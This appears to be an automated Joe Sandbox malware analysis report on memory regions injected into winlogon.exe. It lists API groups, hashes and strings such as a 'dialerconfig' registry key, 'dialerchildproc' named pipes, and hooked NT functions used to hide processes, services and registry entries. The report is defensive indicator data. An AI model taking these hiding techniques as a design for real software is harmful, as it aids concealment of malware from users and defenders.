                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: a0dd4a3191c2f22ec65cd5f9c7d8c34c65d38d6a3a9ca6151c6be4ce44add157
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: 29318376219F909AEB609FA4E8447ED73A0F784745F44812ADB4E57B94EF38C548CB10
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: 3b87e895a044953073a839ffa4b4feaece301703ffc135d08af6657be6a0d668
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: 14317276205F9099EB64DFA4E8443EE73A1F78474AF448029DB4E57B94EF38C548CB10
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: f4e1f7a423249601853f9bf4c02ae152ed9a85bcd9bd447fde6e0ecec31a17ad
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: 1531C73A218F90A6DB60DFA9E8443EE73A0F789755F504126EB9E43B94DF38C145CB00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: 4dbdfab791ea173b22a2c1feee1540d37dae8e72db698209205baee473c09c96
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: 7631C93A214F90A6EB64CFA9E8443DE73A0F789756F504126EB9D43B54DF38C145CB00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: d33dc497d620ec2850d47fa6d7599d0f75ef197f864d2f2ea1a1538dcd62ba05
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: 54113026714F119AEF50CFE8E8593A833A4F719759F440E21DB6D467A4DF78C1A8C380
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                              • Instruction ID: 712154813c46b612020be7a143dde11e41283ee14142f5bab4be78c3f0fa479c
                                                              • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                              • Instruction Fuzzy Hash: 11511A26B0CBA0A9FB20DBBAE84879E7BA1F740BD5F148155EE5927B95DB38C001C700
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                              • Instruction ID: da0f1b53d22c38e7f028f1682345193667a56556076439a06e8349e4d1e3cf91
                                                              • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                              • Instruction Fuzzy Hash: 3C510926700FE0A9FB20DFBAA84879E7BA5F7447D5F248114EE58A7B95DB38C411C700
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                              • Instruction ID: fee74b632db8da7adfbcef3e822971e4130eb4171b3ad2da802a4781d9383549
                                                              • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                              • Instruction Fuzzy Hash: EAF062B57146A49EDBA98F6CA80671A77E1F308381FD4C029D68983B04D33C8061CF04

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 545a197093dbf33f1111aaff3c94dd347963510d91bf182c1d2d2b3e49a62449
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: 1B71FE7A314E24E6EB10DFAAE85869D33B5FB84B8AF109111DE4E97B69DF38C444C740

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: fb1b484c7ebee393b1b53cdd5cd81ac2c1ca147a5507fda1b24fca473b782784
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 46515E7A214F9496EB64CFAAE54836A77A1F789F9AF148124DF4A07B58DF3CC045C700

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: d2d635d82ad37731a82d28168a5eda6b08545a77464cd3cb2b7161adfafd8aad
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 22516C7A200F94DAEB54CFAAE54835A77A6F789F9AF148124DE4A47728DF3CC049C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: 52c27ab1b4cc8d1b0b7a026bbb00d0580f7e8789e5eca17ee175a033894297e0
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: 9231B8AC518DAAB0EB46EFEDE9597D43361B70434BF90D093940B025B1AF38828AC350
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: bae3e35cc23bdf7e795311711b41c652c83ad71068a264824faefe60a6291ab9
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: 583195AC240D6AB0EA46EFEDE8697D46361B70474BF94D023D80986675EF3CC249C350
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 7539ecd07ed9e19813cea4b70ed8e4e8e5b401edcb5cd18e99020899339b4ff2
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: DF81122D702E71A6FE60EBED944D35962E0EB95783F18C425AB4983797EF38C946C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 22cde9f525fffbeb1c6e8d8417a217ee6af8dab08b44ae11a5e6f92b2a2e472d
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: 5581E26D710E61A6FA54EBEE944D35923D0EB85B82F58C8259B0947FD7EF38C846CB00
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 00000225DC64CE37
                                                              • FlsGetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEBC
                                                              • SetLastError.KERNEL32 ref: 00000225DC64CED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,00000225DC64ECCC,?,?,?,?,00000225DC64BF9F,?,?,?,?,?,00000225DC647AB0), ref: 00000225DC64CF2C
                                                                • Part of subcall function 00000225DC64D6CC: HeapAlloc.KERNEL32 ref: 00000225DC64D721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF54
                                                                • Part of subcall function 00000225DC64D744: HeapFree.KERNEL32 ref: 00000225DC64D75A
                                                                • Part of subcall function 00000225DC64D744: GetLastError.KERNEL32 ref: 00000225DC64D764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF76
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: c96d39c070731bccc58dc25472949b9c8324ede58aceb138708ddbc32eb2cb43
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: 3B41AB2C34CE64B6FE68A7FD955D36932825F857B2F24C7A4A937467E6DF388442C200
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 00000225DC6ACE37
                                                              • FlsGetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACEBC
                                                              • SetLastError.KERNEL32 ref: 00000225DC6ACED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,00000225DC6AECCC,?,?,?,?,00000225DC6ABF9F,?,?,?,?,?,00000225DC6A7AB0), ref: 00000225DC6ACF2C
                                                                • Part of subcall function 00000225DC6AD6CC: HeapAlloc.KERNEL32 ref: 00000225DC6AD721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF54
                                                                • Part of subcall function 00000225DC6AD744: HeapFree.KERNEL32 ref: 00000225DC6AD75A
                                                                • Part of subcall function 00000225DC6AD744: GetLastError.KERNEL32 ref: 00000225DC6AD764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF76
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: 16b8eac9f94798cf318e2989be29cf1ddfaa1c447e8d99b4c7a956a79ddaff1c
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: 47415868300E6472FE68EBFD565D36922826F887B2F34C724A936C77E6DE39D441D201
Memory Dump Source
• Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
• API String ID: 2171963597-1373409510
Memory Dump Source
• Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
• API String ID: 2171963597-1373409510
Memory Dump Source
• Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
Memory Dump Source
• Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
Memory Dump Source
• Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
Memory Dump Source
• Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
Memory Dump Source
• Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
Memory Dump Source
• Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
Memory Dump Source
• Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
Memory Dump Source
• Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
APIs
• FlsGetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D087
• FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0A6
• FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0CE
• FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0DF
• FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0F0
Memory Dump Source
• Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
APIs
• FlsGetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD087
• FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0A6
• FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0CE
• FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0DF
• FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0F0
Memory Dump Source
• Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
Memory Dump Source
• Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
Memory Dump Source
• Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
Memory Dump Source
• Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
Memory Dump Source
• Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
Memory Dump Source
• Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
Similarity
